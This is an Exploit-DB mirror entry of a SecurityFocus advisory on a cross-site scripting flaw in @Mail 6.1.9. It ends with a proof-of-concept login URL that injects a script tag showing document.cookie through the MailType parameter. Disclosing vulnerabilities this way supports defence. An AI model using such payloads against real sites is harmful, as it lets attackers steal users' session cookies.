exploit-db-mirror/platforms/php/webapps/34690.txt
Offensive Security a64816e686 Updated 09_20_2014
2014-09-20 04:43:56 +00:00

9 lines
No EOL
777 B
Text
Executable file

source: http://www.securityfocus.com/bid/43377/info
@Mail is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary JavaScript code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
@Mail 6.1.9 is vulnerable; prior versions may also be affected.
http://www.example.com/index.php/mail/auth/processlogin?emailName=<emailName>&emailDomain=<emailDomain>&cssStyle=original&email=<email>password=<password>&requestedServer=&MailType=<script>alert(document.cookie);</script>